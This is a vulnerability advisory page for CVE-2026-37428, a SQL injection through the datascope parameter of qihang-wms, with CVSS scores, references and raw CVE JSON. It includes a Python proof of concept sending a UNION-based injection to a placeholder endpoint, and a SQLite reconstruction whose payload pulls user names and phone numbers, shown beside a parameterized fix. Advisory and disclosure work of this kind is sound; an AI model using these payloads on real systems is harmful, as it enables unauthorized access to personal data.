Security Vulnerability Report
CVE-2026-37428 CVSS 6.5 MEDIUM

Published: 2026-05-13 14:17:27
Last Modified: 2026-05-13 19:17:12

Description

qihang-wms commit 75c15a was discovered to contain a SQL injection vulnerability via the datascope parameter in the SysDeptMapper.xml file. This vulnerability allows attackers to access sensitive database information, including users' Personally Identifiable Information (PII).

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No CPE configuration data is available for this entry. The only affected-product information is what the description gives: qihang-wms at commit 75c15a.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target URL placeholder (based on the vulnerability context): the advisory
# does not name the endpoint, so the path must be taken from the deployed
# qihang-wms instance.
target_url = "http://target-wms-endpoint/api/dept/query"

# Malicious payload demonstrating SQL injection via datascope:
# union-based injection attempting to read the database version.
# The column count (4) is a guess and must be matched to the real query.
# The comment terminator is "-- " (trailing space) rather than "--+":
# requests percent-encodes "+" as %2B, so the server would receive a
# literal plus sign, which MySQL does not accept after "--".
payload = "1' UNION SELECT 1, version(), 3, 4-- "

# Vulnerable parameter identified in SysDeptMapper.xml
params = {"datascope": payload}

try:
    # Send the malicious request
    response = requests.get(target_url, params=params, timeout=10)
    if response.status_code == 200:
        # A 200 only shows the request was accepted; look for the injected
        # version string in the body before calling the target vulnerable.
        print("[+] Request accepted; inspect the response for injected data:")
        print(response.text[:500])  # Print the first 500 chars for verification
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error occurred: {e}")
```
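The advisory does not show the mapper, so the following is an added illustration of the server-side mechanism behind a datascope injection, not code from qihang-wms. It assumes, as a hypothetical reconstruction, that the datascope value is spliced into the SQL text of a department query (the effect of a `${...}` substitution in a MyBatis mapper) inside an `IN (...)` list; the schema, the table and column names, the sample rows and the payload are all constructed. Because the demo runs on SQLite rather than MySQL, the payload reads a PII table instead of calling `version()`. The hardened variant validates the scope as a list of integer ids and binds them as parameters, which is the CWE-89 fix the report implies.

```python
import re
import sqlite3

# Constructed sample schema: a department table and a user table holding PII.
SCHEMA = """
CREATE TABLE sys_dept (dept_id INTEGER PRIMARY KEY, dept_name TEXT);
CREATE TABLE sys_user (user_id INTEGER PRIMARY KEY, user_name TEXT, phonenumber TEXT);
INSERT INTO sys_dept VALUES (1, 'Head Office'), (2, 'Warehouse A'), (3, 'Warehouse B');
INSERT INTO sys_user VALUES (100, 'alice', '13800000001'), (101, 'bob', '13800000002');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def query_depts_vulnerable(conn, datascope):
    # Hypothetical reconstruction of the flaw: the datascope value is spliced
    # into the SQL text, so any SQL syntax it carries becomes part of the
    # statement (this is what a MyBatis ${...} substitution does).
    sql = f"SELECT dept_id, dept_name FROM sys_dept WHERE dept_id IN ({datascope})"
    return conn.execute(sql).fetchall()


_ID_LIST = re.compile(r"\d+(,\d+)*")


def query_depts_hardened(conn, datascope):
    # Validate the scope as a comma-separated list of integer ids, then bind
    # each id as a parameter: the SQL text never contains caller-controlled
    # characters, so the payload below cannot alter the statement.
    if not _ID_LIST.fullmatch(datascope):
        raise ValueError("datascope must be a comma-separated list of integer ids")
    ids = [int(x) for x in datascope.split(",")]
    placeholders = ",".join("?" * len(ids))
    sql = (
        "SELECT dept_id, dept_name FROM sys_dept "
        f"WHERE dept_id IN ({placeholders}) ORDER BY dept_id"
    )
    return conn.execute(sql, ids).fetchall()


# Constructed payload: closes the IN list, appends a UNION that reads the user
# table, and comments out the rest of the original statement.
PAYLOAD = "0) UNION SELECT user_name, phonenumber FROM sys_user --"


def demo():
    conn = make_db()
    leaked = query_depts_vulnerable(conn, PAYLOAD)
    try:
        query_depts_hardened(conn, PAYLOAD)
        blocked = False
    except ValueError:
        blocked = True
    legit = query_depts_hardened(conn, "1,2")
    return leaked, blocked, legit


if __name__ == "__main__":
    leaked, blocked, legit = demo()
    print("vulnerable query returned:", leaked)
    print("hardened query rejected payload:", blocked)
    print("hardened query with '1,2':", legit)
```

The vulnerable function returns the user names and phone numbers from `sys_user` even though the query only names `sys_dept`, which is the PII exposure the advisory describes; the hardened function rejects the same input before any SQL is built.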

References

https://gist.github.com/Y4y17/6587147a37eba5b31de832e067f317ef
https://github.com/Y4y17/CVE/blob/main/%E5%90%AF%E8%88%AA%E7%94%B5%E5%95%86WMS/SQL%20injection%20vulnerability-1.md

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-37428",
    "sourceIdentifier": "cve@mitre.org",
    "published": "2026-05-13T14:17:27.320",
    "lastModified": "2026-05-13T19:17:12.127",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "qihang-wms commit 75c15a was discovered to contain a SQL injection vulnerability via the datascope parameter in the SysDeptMapper.xml file. This vulnerability allows attackers to access sensitive database information, including users' Personally Identifiable Information (PII)."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-89"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://gist.github.com/Y4y17/6587147a37eba5b31de832e067f317ef",
        "source": "cve@mitre.org"
      },
      {
        "url": "https://github.com/Y4y17/CVE/blob/main/%E5%90%AF%E8%88%AA%E7%94%B5%E5%95%86WMS/SQL%20injection%20vulnerability-1.md",
        "source": "cve@mitre.org"
      }
    ]
  }
}
```